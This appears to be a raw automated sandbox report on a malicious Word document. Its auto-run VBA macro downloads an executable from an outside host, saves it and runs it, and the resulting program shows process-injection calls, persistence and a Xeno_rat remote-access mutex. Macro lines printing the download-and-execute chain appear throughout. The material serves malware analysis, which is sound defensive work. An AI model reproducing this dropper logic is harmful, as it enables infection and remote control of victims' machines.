                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{79847720-215F-4E11-8E77-239CB6350007}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: www.stipamana.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                      Source: unknownHTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49161 version: TLS 1.2

                      System Summary

                      barindex
                      Source: yIla7SeJ6r.docOLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: Set WshShell = CreateObject("WScript.Shell")Name: Document_Open
                      Source: yIla7SeJ6r.docStream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, API IXMLHTTPRequest.Open("get","https://www.stipamana.com/sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe",False)Name: Document_Open
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, API Stream.Open()Name: Document_Open
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, API Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdAc\x0b?\x02?\x00\x00\x00?\x02 \x00?\x02\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x02?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x02S\x00?\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x02\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x02 \x00?\x02?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x02?\x00?\x02\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x02?\x00?\x02\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x02\x00\x00H\x00\x02\x05?\x02?\x00\x03\x00\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??????????????????????????????????????????????????????????????o????????????????????????????????????????????????????????R????????????????????????????????????????????????????E???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Z??J????????????????????????????????????????j???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????\xfffd?????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????????g????????e??????????????????\xfffd?????????????????????|?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j???????????????????????????????????????????????r?????%??????????????????????\x11?????????????????????????????!???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd?+????????????????????????????????????????\xfffd?\xfffd????\xfffd?????????????Name: Document_Open
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, API IShellDispatch6.Open("C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe")Name: Document_Open
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, found possibly 'ADODB.Stream' functions open, savetofile, writeName: Document_Open
                      Source: ~WRD0000.tmp.0.drStream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
                      Source: yIla7SeJ6r.docStream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, sendName: Document_Open
                      Source: ~WRD0000.tmp.0.drStream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                      Source: yIla7SeJ6r.docStream path 'Macros/VBA/ThisDocument' : found hex strings
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd, String ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5
                      Source: ~WRD0000.tmp.0.drStream path 'Macros/VBA/ThisDocument' : found hex strings
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exeJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 770B0000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 770B0000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMemory allocated: 770B0000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EC458 NtResumeThread,4_2_002EC458
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EC678 NtWriteVirtualMemory,4_2_002EC678
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EC328 NtReadVirtualMemory,4_2_002EC328
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EC7D0 NtSetContextThread,4_2_002EC7D0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EC451 NtResumeThread,4_2_002EC451
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EC670 NtWriteVirtualMemory,4_2_002EC670
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EC320 NtReadVirtualMemory,4_2_002EC320
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EC7C8 NtSetContextThread,4_2_002EC7C8
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030C458 NtResumeThread,8_2_0030C458
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030C678 NtWriteVirtualMemory,8_2_0030C678
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030C328 NtReadVirtualMemory,8_2_0030C328
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030C7D0 NtSetContextThread,8_2_0030C7D0
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030C451 NtResumeThread,8_2_0030C451
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030C670 NtWriteVirtualMemory,8_2_0030C670
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030C320 NtReadVirtualMemory,8_2_0030C320
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030C7C8 NtSetContextThread,8_2_0030C7C8
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DC458 NtResumeThread,17_2_001DC458
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DC678 NtWriteVirtualMemory,17_2_001DC678
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DC328 NtReadVirtualMemory,17_2_001DC328
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DC7D0 NtSetContextThread,17_2_001DC7D0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DC451 NtResumeThread,17_2_001DC451
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DC670 NtWriteVirtualMemory,17_2_001DC670
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DC320 NtReadVirtualMemory,17_2_001DC320
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DC7C8 NtSetContextThread,17_2_001DC7C8
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EA42A4_2_002EA42A
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002E08684_2_002E0868
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EB8704_2_002EB870
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002E38F84_2_002E38F8
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002E50C94_2_002E50C9
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EC9214_2_002EC921
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002ED6BA4_2_002ED6BA
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002E82E24_2_002E82E2
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002E6F884_2_002E6F88
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002E1B904_2_002E1B90
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002E38E74_2_002E38E7
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EA1204_2_002EA120
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4_2_002EA1104_2_002EA110
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 5_2_002D0B605_2_002D0B60
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_003020306_2_00302030
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_003044586_2_00304458
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_0030CDC86_2_0030CDC8
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_0030E2086_2_0030E208
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_003032586_2_00303258
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_0030F6D86_2_0030F6D8
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_003063716_2_00306371
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_00300B606_2_00300B60
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_0030EBA86_2_0030EBA8
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_00307F906_2_00307F90
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_0030BF986_2_0030BF98
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_0030E1F86_2_0030E1F8
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_0030E1C06_2_0030E1C0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 6_2_0030BA486_2_0030BA48
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030A42A8_2_0030A42A
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030B8708_2_0030B870
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_003008688_2_00300868
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_003038F88_2_003038F8
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_003050C98_2_003050C9
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030C9218_2_0030C921
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030D6B28_2_0030D6B2
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_003082E28_2_003082E2
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_00301B908_2_00301B90
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_00306F8A8_2_00306F8A
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_003038E78_2_003038E7
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030A1208_2_0030A120
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 8_2_0030A1108_2_0030A110
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 9_2_00300B609_2_00300B60
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 11_2_001C0B6011_2_001C0B60
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 12_2_00360B6012_2_00360B60
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DA42A17_2_001DA42A
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DB87017_2_001DB870
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001D086817_2_001D0868
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001D50C917_2_001D50C9
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001D38F817_2_001D38F8
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DC92117_2_001DC921
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DAA8217_2_001DAA82
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DD6BA17_2_001DD6BA
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001D82E217_2_001D82E2
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001D1B9017_2_001D1B90
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001D6F8817_2_001D6F88
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001D38E717_2_001D38E7
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DA11017_2_001DA110
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DA12017_2_001DA120
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DABBA17_2_001DABBA
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 17_2_001DABD117_2_001DABD1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 18_2_001C0B6018_2_001C0B60
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 19_2_001C0B6019_2_001C0B60
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 20_2_001C0B6020_2_001C0B60
                      Source: yIla7SeJ6r.docOLE, VBA macro line: Private Sub Document_Open()
                      Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Function JbxHook_Open_0__ob(jbxline, ByRef jbxthis)
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Static jbxtresh_Open as Integer
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxHook_Open_0__ob = jbxthis.Open
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_0__ob
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Static jbxtresh_Open as Integer
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Function JbxHook_Open_3__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Static jbxtresh_Open as Integer
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxHook_Open_3__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: Private Sub Document_Open()
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxHook_Open_3__ob 60, lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ, "get", pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd("h://www.m.m/dhw/zgdggwwgggg/dghghwhghgh/bhdh."), False
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxHook_Open_0__ob 65, TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr
                      Source: ~WRD0000.tmp.0.drOLE, VBA macro line: JbxHook_Open_1__ob 71, xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg, (zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT)
                      Source: yIla7SeJ6r.docOLE indicator, VBA macros: true
                      Source: ~WRD0000.tmp.0.drOLE indicator, VBA macros: true
                      Source: ~WRF{7D8270C0-44E1-49AB-A84D-3D6A12FBB8A9}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe 21B7B8656A008AD3E5DF1725CDDF55E650812C1F3D59609F14C0D3089A886DE6
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe 21B7B8656A008AD3E5DF1725CDDF55E650812C1F3D59609F14C0D3089A886DE6
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe 21B7B8656A008AD3E5DF1725CDDF55E650812C1F3D59609F14C0D3089A886DE6
                      Source: brtyhdrh[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: MDEODF.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: MDEODF.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 4.2.MDEODF.exe.600000.2.raw.unpack, -----------------------------------------.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.MDEODF.exe.201a318.4.raw.unpack, Encryption.csCryptographic APIs: 'CreateDecryptor'
                      Source: 8.2.MDEODF.exe.2419b5c.1.raw.unpack, Encryption.csCryptographic APIs: 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@28/17@1/2
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$la7SeJ6r.docJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeMutant created: \Sessions\1\BaseNamedObjects\Xeno_rat_nd8912d-admin
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR862F.tmpJump to behavior
                      Source: yIla7SeJ6r.docOLE indicator, Word Document stream: true
                      Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
                      Source: yIla7SeJ6r.docOLE document summary: title field not present or empty
                      Source: ~WRD0000.tmp.0.drOLE document summary: title field not present or empty
                      Source: ~WRF{7D8270C0-44E1-49AB-A84D-3D6A12FBB8A9}.tmp.0.drOLE document summary: title field not present or empty
                      Source: ~WRF{7D8270C0-44E1-49AB-A84D-3D6A12FBB8A9}.tmp.0.drOLE document summary: author field not present or empty
                      Source: ~WRF{7D8270C0-44E1-49AB-A84D-3D6A12FBB8A9}.tmp.0.drOLE document summary: edited time not present or 0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe"
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe "C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe"
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeProcess created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
